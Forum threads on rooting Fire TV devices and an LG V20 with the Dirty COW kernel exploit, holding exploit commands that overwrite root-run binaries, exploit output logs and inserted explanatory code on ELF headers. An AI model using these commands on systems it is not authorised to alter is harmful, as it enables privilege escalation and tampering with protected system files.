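manifest_diff "$BASELINE" "$CURRENT"
tmp=$(mktemp)
printf '\177ELF\002\001\001' > "$tmp"
is_elf "$tmp" && echo "$tmp: ELF binary"
printf '#!/system/bin/sh\n' > "$tmp"
is_elf "$tmp" || echo "$tmp: not ELF (script in place of a binary)"
rm -f "$tmp"
```

On a device, `make_manifest /system/bin/*` taken right after a clean boot gives the baseline; re-running it later and feeding both to `manifest_diff` shows exactly which root-executed binaries changed during this boot.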
Can you downgrade with being in the root state?
sconnyuk said:
Can you downgrade with being in the root state?
Yes. After rooting, I downgraded to 5.1.0.2 and did a full bootloader unlock. I am now running a rooted 5.2.1.1
christofsteel said:
Yes. After rooting, I downgraded to 5.1.0.2 and did a full bootloader unlock. I am now running a rooted 5.2.1.1
Will have to try this for fire stick.
Excellent find, I've been watching the dirtycow and this will come in handy if it works for the fire stick.
sconnyuk said:
Will have to try this for fire stick.
Excellent find, I've been watching the dirtycow and this will come in handy if it works for the fire stick.
Please report back
I think it is important to note, that I configured a static ip address to trigger the ip script. Root is permanent btw. as soon as the su binary is deployed, you can reboot all you like.
Does the Fire TV have SELinux? What version of Linux is it?
christianrodher said:
Does the Fire TV have SELinux? What version of Linux is it?
I thought I read somewhere, that FireOS 5 had SELinux. I could not check, because I still ran FireOS 3. Seems like it does not have SELinux. I will remove the remark from my initial post.
christofsteel said:
I thought I read somewhere, that FireOS 5 had SELinux. I could not check, because I still ran FireOS 3. Seems like it does not have SELinux. I will remove the remark from my initial post.
can you double check if sepolicy is present or something similar?
christianrodher said:
can you double check if sepolicy is present or something similar?
Ok. In my FireOS version 5.2.1.1 there is SELinux activated and enforcing. In FireOS version 51.1.0.4 there was none. But I do not know if that hinders the rooting process.
christofsteel said:
Ok. In my FireOS version 5.2.1.1 there is SELinux activated and enforcing. In FireOS version 51.1.0.4 there was none. But I do not know if that hinders the rooting process.
OK, so when you did the exploit you were at SELinux enforcing.... OK, if it is that simple after we've been working our asses off here https://github.com/timwr/CVE-2016-5195/issues/9 I'm going to break the PC and the cell phone lol
@christianrodher No worries, I doubt this is the universal solution! I think it's that the TV runs `ip` with a really lenient SELinux context for some stupidly weird reason.
christianrodher said:
OK, so when you did the exploit you were at SELinux enforcing.... OK, if it is that simple after we've been working our asses off here https://github.com/timwr/CVE-2016-5195/issues/9 I'm going to break the PC and the cell phone lol
No, I did the exploit on my FireOS version 51.1.0.4. Afaik there was no SELinux present. SELinux is present in FireOS version 5.2.1.1. I can test if this exploit works on my now updated Fire TV.
Edit: It did not work, I could not mount /system read-write. Seems like it only works for FireOS 3.
Really tried to get this to work. I think I'm close. I saw SELinux complain about the file size so I did some padding. Here's where I'm at
187594885]
I/Kernel ( 163): [ 1503.059370] (0)[163:healthd]healthd: battery l=100 v=4200 t=2.2 h=2 st=5 chg=u
W/linker (10431): ./dirtycow: unused DT entry: type 0x6ffffffe arg 0x600
W/linker (10431): ./dirtycow: unused DT entry: type 0x6fffffff arg 0x1
I/exploit (10431): size 223296
I/exploit (10431):
I/exploit (10431): [*] mmap 0xf7546000
I/exploit (10431): [*] exploit (patch)
I/exploit (10431): [*] currently 0xf7546000=464c457f
I/exploit (10431): [*] madvise = 0xf7546000 223296
I/Kernel ( 0): [ 1509.432532]-(2)[0:swapper/2]CPU2: Booted secondary processor
I/Kernel ( 0): [ 1509.437302]-(3)[0:swapper/3]CPU3: Booted secondary processor
I/Kernel ( 87): [ 1509.437743] (0)[87:hps_main][HPS] (0004)(1)(0)action end(27)(35)(0)(2) (2)(2)(2)(2)(2)(2)(2)(2)(1)(0) (6)(230)(0) (0)(0)(0) (0)(6)(230)(0)(6)
I/exploit (10431): [*] madvise = 0 1048576
I/Kernel ( 0): [ 1511.439231]-(1)[0:swapper/1]CPU1: Booted secondary processor
I/Kernel ( 87): [ 1511.440339] (0)[87:hps_main]CPU3: shutdown
I/Kernel ( 87): [ 1511.440873] (0)[87:hps_main][HPS] (0800)(1)(2)action end(105)(102)(0)(1) (2)(2)(2)(2)(2)(2)(2)(2)(1)(0) (105)(10)(0) (1666)(10)(0) (0)(102)(10)(0)(102)
I/exploit (10431): [*] /proc/self/mem -1048576 1048576
I/exploit (10431): [*] exploited 0xf7546000=464c457f
I/art ( 501): Background partial concurrent mark sweep GC freed 256902(12MB) AllocSpace objects, 15(2MB) LOS objects, 33% free, 20MB/31MB, paused 690us total 136.802ms
E/WifiStateMachine( 501): WifiStateMachine CMD_START_SCAN source -2 txSuccessRate=50.64 rxSuccessRate=38.79 targetRoamBSSID=58:6d:8f:09:b7:37 RSSI=-39
E/WifiStateMachine( 501): WifiStateMachine L2Connected CMD_START_SCAN source -2 93, 94 ignore because P2P is connected
I/Kernel ( 87): [ 1513.438566] (0)[87:hps_main]CPU2: shutdown
I/Kernel ( 87): [ 1513.439651] (0)[87:hps_main][HPS] (0400)(2)(1)action end(7)(4)(0)(0) (2)(2)(2)(2)(2)(2)(2)(2)(1)(0) (7)(10)(0) (288)(10)(0) (0)(4)(10)(0)(4)
I/Kernel ( 87): [ 1515.438476] (0)[87:hps_main]CPU1: shutdown
I/Kernel ( 87): [ 1515.439146] (0)[87:hps_main][HPS] (0200)(2)(0)action end(4)(3)(0)(0) (2)(2)(2)(2)(2)(2)(2)(2)(1)(0) (4)(10)(0) (46)(10)(0) (0)(3)(10)(0)(3)
I/Kernel ( 119): [ 1521.197537] (0)[119:wdtk-0]wdk: [WDK], local_bit:0x1, cpu:0, check_bit:0x1, RT[1521197519702]
I/Kernel ( 119): [ 1521.197575] (0)[119:wdtk-0]wdk: [WDK]: kick Ex WDT,RT[1521197568471]
E/WifiStateMachine( 501): WifiStateMachine CMD_START_SCAN source -2 txSuccessRate=3.98 rxSuccessRate=3.61 targetRoamBSSID=58:6d:8f:09:b7:37 RSSI=-39
E/WifiStateMachine( 501): WifiStateMachine L2Connected CMD_START_SCAN source -2 94, 95 ignore because P2P is connected
^C
C:\Program Files (x86)\Minimal ADB and Fastboot>
130|[email protected]:/data/local/tmp $ getenforce
Enforcing
130|[email protected]:/data/local/tmp $ getenforce
Enforcing
I have an AFTV2 running the latest firmware. I also noticed the Chainfire su binary I had was 32-bit, so I grabbed a 64-bit one. Still no dice.
[email protected]:/data/local/tmp $ ls -la
-rwxrwxrwx shell shell 13776 2016-10-31 17:43 dirtycow
-rwxrwxrwx shell shell 223296 2016-10-31 18:27 ip
-rwxrwxrwx shell shell 223296 2016-10-31 19:48 ip_script
-rwxrwxrwx shell shell 108480 2016-10-31 19:39 su
[email protected]:/data/local/tmp $
Hope this helps someone.
I've reached Step 3, I don't understand what you mean by su binary, as in, the whole flashable zip of supersu? or something else? Could you please explain? Thank you
Edit: Before I carry on, I was attempting this on the fire tv *Stick* instead of the box, running 5.2.1.1 would it still work?
VastVenomm said:
I've reached Step 3, I don't understand what you mean by su binary, as in, the whole flashable zip of supersu? or something else? Could you please explain? Thank you
Edit: Before I carry on, I was attempting this on the fire tv *Stick* instead of the box, running 5.2.1.1 would it still work?
You need to extract the su binary file from the SuperSU.apk.
I ran:
./dirtycow /system/bin/ip ip_script
I marked the scripts as 755 as well.
Error:
/system/bin/sh: ./dirtycow: not executable: 64-bit ELF file.
I also tried compiling dirtycow as 32bit. And got:
/system/bin/sh: ./dirtycow: not executable: 32-bit ELF file.
Help would be appreciated, thank you.
Do you save the shell script as ip_script.sh?
Sent from my SM-G920P using Tapatalk
VastVenomm said:
I've reached Step 3, I don't understand what you mean by su binary, as in, the whole flashable zip of supersu? or something else? Could you please explain? Thank you
Edit: Before I carry on, I was attempting this on the fire tv *Stick* instead of the box, running 5.2.1.1 would it still work?
You do not need to extract the binary from the SuperSU.apk, rather download the zip from here: https://download.chainfire.eu/696/supersu/
Then extract the zipfile and copy the su file from the arm folder.
Edit: I think it would not work because FireOS > 5.2.0.0 has SELinux activated. This method does not seem to work with SELinux.
VastVenomm said:
I ran:
./dirtycow /system/bin/ip ip_script
I marked the scripts as 755 as well.
Error:
/system/bin/sh: ./dirtycow: not executable: 64-bit ELF file.
I also tried compiling dirtycow as 32bit. And got:
/system/bin/sh: ./dirtycow: not executable: 32-bit ELF file.
Help would be appreciated, thank you.
You compiled the source to x86 code. You need to compile dirtycow with a compiler for ARM. I recommend using Android's NDK.
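The "not executable: 64-bit ELF file" error above is the shell refusing a binary built for the wrong CPU. The following is an added example, not code from this thread or from the dirtycow project, that reads the ELF identification bytes and e_machine field of a binary and reports which architecture it was built for, so a mismatch can be diagnosed before copying a file to a device. The sample headers are constructed inline, and the device ABI table (which binaries a 32-bit or 64-bit ARM device can run) is an assumption made for this example:

```python
import struct

# Added example: inspect an ELF header to see which CPU and bitness a binary
# was built for. The e_machine codes below are from the ELF specification.
E_MACHINE_NAMES = {
    0x03: "x86",
    0x3E: "x86-64",
    0x28: "ARM",
    0xB7: "AArch64",
}

# Assumption for this example: a 64-bit ARM Android device runs both AArch64
# and 32-bit ARM binaries, a 32-bit ARM device only runs 32-bit ARM.
DEVICE_ABIS = {
    "arm64": {(64, "AArch64"), (32, "ARM")},
    "arm32": {(32, "ARM")},
}


def elf_target(data: bytes) -> dict:
    """Return bits, byte order and machine name from the first 20 bytes of an ELF file."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class = data[4]  # EI_CLASS: 1 = ELFCLASS32, 2 = ELFCLASS64
    ei_data = data[5]   # EI_DATA: 1 = little-endian, 2 = big-endian
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        raise ValueError("unsupported ELF class or data encoding")
    endian = "<" if ei_data == 1 else ">"
    # e_type and e_machine are two 16-bit fields at offsets 16 and 18
    e_type, e_machine = struct.unpack(endian + "HH", data[16:20])
    return {
        "bits": 32 if ei_class == 1 else 64,
        "endian": "little" if ei_data == 1 else "big",
        "machine": E_MACHINE_NAMES.get(e_machine, "unknown(0x%x)" % e_machine),
        "e_type": e_type,
    }


def compatible_with(data: bytes, device: str) -> bool:
    """True if a binary with this header can run on the given device class."""
    info = elf_target(data)
    return (info["bits"], info["machine"]) in DEVICE_ABIS[device]


def diagnose(data: bytes, device: str) -> str:
    """Explain a 'not executable: N-bit ELF file' style failure in one line."""
    info = elf_target(data)
    if compatible_with(data, device):
        return "ok: %d-bit %s binary matches device %s" % (
            info["bits"], info["machine"], device)
    return "mismatch: %d-bit %s binary cannot run on %s; rebuild with a toolchain targeting that device" % (
        info["bits"], info["machine"], device)


def _header(ei_class: int, e_machine: int) -> bytes:
    """Constructed sample: a minimal little-endian ELF header prefix (e_type = ET_EXEC)."""
    ident = b"\x7fELF" + bytes([ei_class, 1, 1, 0]) + bytes(8)
    return ident + struct.pack("<HH", 2, e_machine)


# Constructed sample headers (not real binaries): an x86-64 build such as a
# host compiler produces by default, and a 32-bit ARM build from an ARM toolchain.
SAMPLE_X86_64 = _header(2, 0x3E)
SAMPLE_ARM32 = _header(1, 0x28)

if __name__ == "__main__":
    for name, blob in (("x86-64 build", SAMPLE_X86_64), ("ARM build", SAMPLE_ARM32)):
        print(name, "->", diagnose(blob, "arm64"))
```

Run it against a real file by passing the first 20 bytes of the binary (`open(path, "rb").read(20)`) to `diagnose`; a reported machine of x86 or x86-64 means the file was compiled for the host, which is exactly the condition the reply above describes.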
I still got 5.0.5.1 on my FTV1. Is there a chance that I might get root using the dirtycow exploit?
christofsteel said:
You do not need to extract the binary from the SuperSU.apk, rather download the zip from here: https://download.chainfire.eu/696/supersu/
Then extract the zipfile and copy the su file from the arm folder.
Edit: I think it would not work because FireOS > 5.2.0.0 has SELinux activated. This method does not seem to work with SELinux.
You compiled the source to x86 code. You need to compile dirtycow with a compiler for arm. I recommend using androids ndk.
Rename the apk to zip and extract su, no difference from what I posted.

Recowvery issue - adb logcat -s recowvery

Hey all -
I'm trying to root my V20 with some complications along the way!
I'm currently at the Recowvery setup (I've tried manual & "Easy Recowvery") and I cannot seem to get past the "adb logcat -s recowvery" step.
On my command prompt, all I end up seeing is:
--------- beginning of system
--------- beginning of main
to no end. I've waited hours. No "successful" message as stated there should be when it finishes what it needs to do.
I have a feeling this is a permission issue, because when I tried to use the "Easy Recowvery" method, it had said it could not create log files, etc in the directory that I was trying to run the easy setup from.
I then tried to run CMD w/ administrative privileges - same problem, still stuck at the aforementioned information displayed. The only way I can then get out of this is escaping via "Ctrl+C", and nothing ends up being done, because when I try the next step "adb shell reboot recovery", my phone goes to a black screen that just says, "No Command" - and then I have to go into the usual recovery by holding the power button, then volume-up.
Are there any suggestions that could be made here? Tips, etc? I'm using the H918 version of the V20 and I would really like to get it rooted - wanted to use crDroid :3
EDIT (Guides I'm following):
The one from theunlockr
and then the dirtycow git page that's linked in another guide (I cannot post actual links yet, apparently :S)
EDIT2 (add'l info):
C:\adb>adb shell
elsa:/ $ cd /data/local/tmp
elsa:/data/local/tmp $ chmod 0777 *
elsa:/data/local/tmp $ ./dirtycow /system/bin/applypatch recowvery-applypatch
warning: new file size (18472) and file old size (165144) differ
size 165144
[*] mmap 0x747ac24000
[*] exploit (patch)
[*] currently 0x747ac24000=10102464c457f
[*] madvise = 0x747ac24000 165144
[*] madvise = 0 1048576
[*] /proc/self/mem 1367343104 1048576
[*] exploited 0x747ac24000=10102464c457f
dirtycow /system/bin/app_process64 recowvery-app_process64 <
warning: new file size (10200) and file old size (18600) differ
size 18600
[*] mmap 0x7331eb7000
[*] exploit (patch)
[*] currently 0x7331eb7000=10102464c457f
[*] madvise = 0x7331eb7000 18600
[*] madvise = 0 1048576
[*] /proc/self/mem -1971322880 1048576
[*] exploited 0x7331eb7000=10102464c457f
elsa:/data/local/tmp $ exit
Not sure if something perhaps went wrong here? Before having to execute the adb logcat -s recowvery command?
EDIT3 (Removed -s from logcat command to see what was going on):
I removed the -s flag from the logcat command to see where it might be stalling..... But after doing this I realized truly what was going on (logcat... duh, logging) - but I never get any kind of message that is said would occur:
adb logcat -s recowvery
"<wait for it to tell you it was successful>"
"[CTRL+C]"
I never get that message, with or without the silent flag.
I feel like the purpose of this step was to log recowvery running? Instead it seems like it's logging EVERYTHING.
Another guide I found said I should be putting my phone in the bootloader/fastloader before running the last bit of steps, but if I do that and try running the adb commands, it will say "null, no device available", or something along those lines.
I no longer know what is going wrong.
EDIT4 (-s is not silent flag when using adb?):
So it turns out the -s flag when using adb isn't the silent flag? Unless it is for logcat? Either way still nothing working. I never get "beginning of crash" like I'm apparently supposed to when running "adb logcat -s recowvery". Halp.
same issue
bump
This issue has been resolved elsewhere. If needed I will make an edit to show the solution once I'm capable of doing so.
May have a working solution. Testing it now and will reply if it works.
---------- Post added at 04:49 AM ---------- Previous post was at 04:47 AM ----------
Yeah, I managed to find the solution myself. Not sure if it's the same solution, but it was a matter of downgrading my firmware to the previous patch from 10k to 10j through LGUP and it's working fine as of now.
Downgrade from V20 version k to version j
After downgrading from version k to j (via LGUP tool) and having the proper files to go along with it. If I am allowed to post a link to the Reddit post that ended up helping me, I will - however it seems by default I am unable to do so.